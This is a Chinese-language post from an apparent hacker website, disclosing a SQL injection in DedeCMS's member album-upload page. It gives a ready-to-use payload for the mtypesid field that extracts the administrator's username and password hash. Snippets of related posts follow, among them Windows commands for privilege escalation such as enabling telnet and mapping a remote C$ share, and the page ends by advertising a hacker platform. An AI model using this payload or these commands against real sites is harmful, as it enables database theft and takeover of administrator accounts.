Dedecms某一处insert型注入

hacker4年前 (2020-05-31)黑客文章667

Dedecms一处注入，较鸡肋，之前变量覆盖的漏洞太轰动了，所以一直没发出，之前5月份最新版本测试的，目前最新版本应该是没修复的
漏洞需要会员，所以比较鸡肋啦!
发表文章处，post表单的mtypesid可以注入

/dedecmsnew/member/album_add.php

注入的代码：

mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where userid='admin'),'',

'','12333','','','1367930810','1367930810','4','image','test','3')#@`'`'

标签: 黑客技术

返回列表

与这个名叫“USBee”的新式令人激动的数据信息过虑专用工具对比，大家的經典黑客工具目录忽然看上去非常惨白。被称作“USBee”，因为它以与航行中的蜜峰相近的方法运作，这类黑帽优化专...

CMD部分提权常用命令 ipconfig 显示本地IP地址 net start telnet 开telnet服务 net use z:127.0.0.1c$　　　　　映射对方的C...

它是这一系列产品的第二篇，第一篇我给你表述了什么叫Shell？那麼这一篇我给你解释一下什么叫Webshell？要表述Webshell，大家务必先表述什么是脚本語言？我通俗化一点讲，...

什么叫Rat Proxy？该专用工具是一种大中型的处于被动和全自动安全性审批专用工具。它对于比较敏感，精确的检验和全自动注解安全性有关的策略模式和潜在性的难题开展了提升，根据对目前客户起动的Web...

什么叫Kismac？ KisMAC是wifi网络发觉黑客工具。虽然代码库是不一样的，但这类时兴的无线网络拦路虎出示了其名字Kismet的好多个作用。这一专用工具出示了一个好看的GUI，而且在Kism...

什么叫w3af？ w3af是搜索和开发设计Web程序运行系统漏洞最时兴，灵便和强劲的专用工具之一。它非常容易应用，它出示了数十种开发设计和网页页面评定软件的作用。别人则将其称之为以互联网为管理中心的...

找黑客平台